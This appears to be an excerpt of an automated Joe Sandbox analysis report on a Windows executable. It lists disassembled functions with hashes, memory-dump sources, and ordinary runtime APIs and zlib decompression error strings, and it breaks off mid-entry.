                                                                                                                                                                                                      • Instruction ID: 7fa8fa7d17d77a76ab597245addec6bd60770b543e87efa53057a6bb7910082f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5eb30dd7dc62229e37aa5031b27090d50e2656cb9eae334aa241f26caa9cb01e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 21B20672A192C28BE7249FA4D480BFDB7A1FB45744F805235DA3D57AD8DF38A910CB90
                                                                                                                                                                                                      Function 00007FF7FF58AD1D Relevance: 12.0, Strings: 9, Instructions: 744COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                                                                                                                                                                      • API String ID: 0-2665694366
                                                                                                                                                                                                      • Opcode ID: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
                                                                                                                                                                                                      • Instruction ID: 899cbd6a794aea12dd8489579677d658fe8b8d257725f069028a8b4a1f20b1e9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 183baba8c618070380c74d0f680cff30a06716a401d1faaba0935d79222a4dc0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F452E372A186E59BE7A49F14C458ABE7BADFB44340F414238E66A877D0DF3CD844CB90
                                                                                                                                                                                                      Function 00007FF7FF58D19C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3140674995-0
                                                                                                                                                                                                      • Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                      • Instruction ID: c2acd07a565e386ac312abf6f36a38e48317dc5d6bc808492fb01e9d945daff6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 19314372609BC196EB609F60E8403EE73A1FB84704F84413ADA6D47B98EF3CD558C750
                                                                                                                                                                                                      Function 00007FF7FF5A5C70 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7FF5A5CB5
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF5A5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FF5A561C
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF59A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7FF5A2D92,?,?,?,00007FF7FF5A2DCF,?,?,00000000,00007FF7FF5A3295,?,?,?,00007FF7FF5A31C7), ref: 00007FF7FF59A9CE
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF59A9B8: GetLastError.KERNEL32(?,?,?,00007FF7FF5A2D92,?,?,?,00007FF7FF5A2DCF,?,?,00000000,00007FF7FF5A3295,?,?,?,00007FF7FF5A31C7), ref: 00007FF7FF59A9D8
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF59A970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7FF59A94F,?,?,?,?,?,00007FF7FF59A83A), ref: 00007FF7FF59A979
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF59A970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7FF59A94F,?,?,?,?,?,00007FF7FF59A83A), ref: 00007FF7FF59A99E
                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7FF5A5CA4
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF5A5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FF5A567C
                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7FF5A5F1A
                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7FF5A5F2B
                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7FF5A5F3C
                                                                                                                                                                                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7FF5A617C), ref: 00007FF7FF5A5F63
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4070488512-0
                                                                                                                                                                                                      • Opcode ID: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                                                                                                                      • Instruction ID: 19577b267cfca23daac5ff011ebdbb43c71149401190becd7be0bf4097eda078
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DBD1C026A0928286EB24BF35D4409F9A791FF45B84FC48235EA3D476D6DF3CE46187A0
                                                                                                                                                                                                      Function 00007FF7FF59A684 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1239891234-0
                                                                                                                                                                                                      • Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                      • Instruction ID: 33fa9eb35eca640c0c64bb445f1c715feab2f126a69611951d5a1ba6ec53cb56
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A0319632618BC196DB60DF64E8402EEB3A4FB88754F940236EAAD43BA9DF3CC155C750
                                                                                                                                                                                                      Function 00007FF7FF5A18E4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2227656907-0
                                                                                                                                                                                                      • Opcode ID: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                      • Instruction ID: 02d96841ccad658c57baafa351ff0ad6bfcc1f1b2a693bf5a34f38f384d63759
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                      • Instruction Fuzzy Hash: ABB1E622B1A6C641EF60AB6194101F9E391EB45BE4F845332DE7E47BC5EE3CE451CBA0
                                                                                                                                                                                                      Function 00007FF7FF5A5EEC Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7FF5A5F1A
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF5A5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FF5A567C
                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7FF5A5F2B
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF5A5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FF5A561C
                                                                                                                                                                                                      • _get_daylight.LIBCMT ref: 00007FF7FF5A5F3C
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF5A5638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7FF5A564C
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF59A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7FF5A2D92,?,?,?,00007FF7FF5A2DCF,?,?,00000000,00007FF7FF5A3295,?,?,?,00007FF7FF5A31C7), ref: 00007FF7FF59A9CE
                                                                                                                                                                                                        • Part of subcall function 00007FF7FF59A9B8: GetLastError.KERNEL32(?,?,?,00007FF7FF5A2D92,?,?,?,00007FF7FF5A2DCF,?,?,00000000,00007FF7FF5A3295,?,?,?,00007FF7FF5A31C7), ref: 00007FF7FF59A9D8
                                                                                                                                                                                                      • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7FF5A617C), ref: 00007FF7FF5A5F63
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3458911817-0
                                                                                                                                                                                                      • Opcode ID: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                                                                                                                      • Instruction ID: b6ef958c8ac94739bf6d8f76c05d987a231373268d83bf905ddb53313eeba5ea
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B8517232A0968286E720FF35D8815E9E760BB49B84FC45235EA7D436D6DF3CE45187E0
                                                                                                                                                                                                      Function 00007FF7FF58D080 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                                                      • Opcode ID: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                      • Instruction ID: d956370f095327b0a8fec152f3f840f2f1dfe7a48a71acb42c300fac3105d4b8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c7e0dc91749b0d7e19b464317103f3c41f17e8dff95374d43b780ecdfe6bf67b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15114C22B15B458AEB00DB60E8542F973B4FB19758F840E31DA3D477A4DF38D1648390
                                                                                                                                                                                                      Function 00007FF7FF5A3C80 Relevance: 4.8, APIs: 3, Instructions: 340COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: memcpy_s
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1502251526-0
                                                                                                                                                                                                      • Opcode ID: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                      • Instruction ID: 8905af6f71f7964b555679a9f8e29820ce2ea6318be740451705dcad4fe59915
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 723df14fe8405c9280d13974b9e0b256372cd2939c4def8ecbac686ef57d643c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6BC10572B1A2C687D7249F59A0846BAF791F794788F808234DB6E57784DF3DE811CB80
                                                                                                                                                                                                      Function 00007FF7FF58A4E4 Relevance: 4.1, Strings: 3, Instructions: 398COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                      • API String ID: 0-1127688429
                                                                                                                                                                                                      • Opcode ID: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
                                                                                                                                                                                                      • Instruction ID: ad51a6e68d4b5467d695309855bf2a143709a1e70b094d277d5e64a8331876af
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41de47797cb66f1826093f4b1d60416fd99d26d25a53ce6bfd127eaa39bdfb5e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 20F1C472A093C55BE795AF14C088BBABAA9FF45740F464278DA79477D1CF38E440CB90
                                                                                                                                                                                                      Function 00007FF7FF5A9798 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 15204871-0
                                                                                                                                                                                                      • Opcode ID: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
                                                                                                                                                                                                      • Instruction ID: 936d09f451a54831d0c965fbfc7d934f2674cc38fb1a3c6023ec892390a64d3a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f74b2cda317b12825bead48c90720a79ba1abfeed249303701d480a1679e454
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48B18D73A05B998BEB15CF29C4463A8BBE0F784B48F158922DB6D837A4CF39D461C750
                                                                                                                                                                                                      Function 00007FF7FF593A14 Relevance: 2.8, Strings: 2, Instructions: 350COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: $
                                                                                                                                                                                                      • API String ID: 0-227171996
                                                                                                                                                                                                      • Opcode ID: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
                                                                                                                                                                                                      • Instruction ID: 2d3f6f2730ac2c732508c38ebc1b12f2d2b2aec967bbed93e7cdaa029feb3d5d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3098a868bf4d382f942c0283459ab4806c0f53f7eb332f8174ba39f6fc7772a0
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 47E1E632908682C2EB7CAF2581501BDB3A9FF45B88F945335DA7E276D5DF29E841C390
                                                                                                                                                                                                      Function 00007FF7FF58A34B Relevance: 2.7, Strings: 2, Instructions: 216COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                      • API String ID: 0-900081337
                                                                                                                                                                                                      • Opcode ID: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
                                                                                                                                                                                                      • Instruction ID: b23648fb82a4d9511575b4e14c0298f11bc10eab4b93c0cb283e82f9ec917c69
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5aba513b73eb8988df982bd12c0510577381bb82701c7147ce4cedc0b53fa8f7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2E91D672A182C697E7A49E14C488BBE7AADFB44350F914279DA7A477D0CF38E540CB90
                                                                                                                                                                                                      Function 00007FF7FF59DF60 Relevance: 2.6, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.1511465811.00007FF7FF581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FF580000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511442281.00007FF7FF580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511499211.00007FF7FF5AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511529578.00007FF7FF5C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.1511584327.00007FF7FF5C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff7ff580000_YgJ5inWPQO.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID: e+000$gfff
                                                                                                                                                                                                      • API String ID: 0-3030954782
                                                                                                                                                                                                      • Opcode ID: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
